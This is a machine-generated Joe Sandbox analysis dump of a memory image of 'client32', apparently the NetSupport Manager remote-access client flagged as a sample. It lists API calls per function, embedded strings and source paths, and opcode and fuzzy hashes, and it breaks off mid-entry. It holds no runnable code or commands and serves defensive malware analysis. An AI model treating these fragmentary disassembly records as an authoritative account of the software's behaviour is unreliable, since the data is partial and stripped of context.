                                                                              • API String ID: 3704029381-2830328467
                                                                              • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                              • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                              • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                              • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,EE49F673), ref: 1105D59E
                                                                              • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,EE49F673), ref: 1105D5A8
                                                                              Strings
                                                                              • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                              • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                              • API String ID: 3094578987-11999416
                                                                              • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                              • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                              • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                              • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoMoveParametersSystemTimerWindow
                                                                              • String ID: Max
                                                                              • API String ID: 1521622399-2772132969
                                                                              • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                              • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                              • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                              • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 111535AC
                                                                              • _memmove.LIBCMT ref: 111535E6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                              • API String ID: 6605023-1396654219
                                                                              • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                              • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                              APIs
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1136984157-1986719024
                                                                              • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                              • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                              • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                              • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                              • API String ID: 819365019-2727927828
                                                                              • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                              • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                              • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                              • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 110ED498
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                              • API String ID: 2577986331-1331251348
                                                                              • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                              • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                              • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                              • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                              APIs
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                              • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                              Strings
                                                                              • PCIVideoSlave32, xrefs: 1103F508
                                                                              • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Find$MessageSendSleep
                                                                              • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                              • API String ID: 1010850397-3146847729
                                                                              • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                              • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                              • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                              • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                              APIs
                                                                              • _free.LIBCMT ref: 110816D7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 2441568934-1875806619
                                                                              • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                              • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                              • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                              • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                              APIs
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,759223A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • _free.LIBCMT ref: 1103D221
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                              • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                              Strings
                                                                              • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                              • String ID: Show has overrun too much, aborting
                                                                              • API String ID: 304545663-4092325870
                                                                              • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                              • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                              • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1136984157-1986719024
                                                                              • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                              • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumExitSleepThreadWindows
                                                                              • String ID: TapiFix
                                                                              • API String ID: 1804117399-2824097521
                                                                              • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                              • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                              • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1319256379-1986719024
                                                                              • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                              • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                              • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                              • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                              • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                              • Opcode Fuzzy Hash: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                              • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                              APIs
                                                                              • MessageBeep.USER32(00000000), ref: 1106791B
                                                                              • MessageBeep.USER32(00000000), ref: 11067957
                                                                              • MessageBeep.USER32(00000000), ref: 110679AA
                                                                              • MessageBeep.USER32(00000000), ref: 110679EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BeepMessage
                                                                              • String ID:
                                                                              • API String ID: 2359647504-0
                                                                              • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                              • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                              • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                              • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                              APIs
                                                                                • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                              • _malloc.LIBCMT ref: 110491DD
                                                                              • _memmove.LIBCMT ref: 110491EA
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040414,?,00000002,00001388,?), ref: 11049224
                                                                              • _free.LIBCMT ref: 1104922B
                                                                                • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                              • String ID:
                                                                              • API String ID: 176360892-0
                                                                              • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                              • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                              • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                              • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                              • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: SleepThread$CreateMessagePost
                                                                              • String ID:
                                                                              • API String ID: 3347742789-0
                                                                              • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                              • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                              • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                              • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                              • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                              • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                              • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                              • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000002C,EE49F673,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                              • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                              • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                              • String ID:
                                                                              • API String ID: 3394196147-0
                                                                              • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                              • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                              • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                              • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                              APIs
                                                                                • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,EE49F673,00000000,00002710,00000001,11027140,EE49F673,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                              • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                              • IsWindow.USER32(00000000), ref: 110436DE
                                                                              • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                              • String ID:
                                                                              • API String ID: 3558565530-0
                                                                              • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                              • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                              • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                              • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,?), ref: 11143091
                                                                              • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                              • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                              • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$RectText
                                                                              • String ID:
                                                                              • API String ID: 4034337308-0
                                                                              • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                              • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                              APIs
                                                                              • SetEvent.KERNEL32 ref: 110675BB
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
